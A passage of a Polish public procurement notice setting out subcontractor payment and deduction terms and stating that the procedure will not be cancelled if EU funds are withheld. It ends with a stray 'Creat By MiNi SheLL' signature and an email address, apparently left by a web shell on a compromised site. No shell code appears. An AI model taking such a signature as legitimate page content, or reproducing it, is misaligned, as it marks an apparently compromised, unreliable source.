punkcie, zamawiający potrąca kwotę wypłaconego wynagrodzenia z wynagrodzenia należnego wykonawcy. 2.15.
Kwota należna Podwykonawcy zostanie uiszczona przez Zamawiającego w złotych polskich (PLN). 2.16. Kwotę
zapłaconą Podwykonawcy lub złożoną do depozytu sądowego Zamawiający potrąca z wynagrodzenia należnego
Wykonawcy. 2.17. W zakresie nieuregulowanym w niniejszym paragrafie do czynności zawierania umów z
podwykonawcami i dalszymi podwykonawcami oraz rozliczeń z nimi stosuje się dotyczące podwykonawstwa
przepisy ustawy - Prawo zamówień publicznych, w tym zwłaszcza art. 2 punkt 9b, art. 36a i 36b oraz art.
143a-143d...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com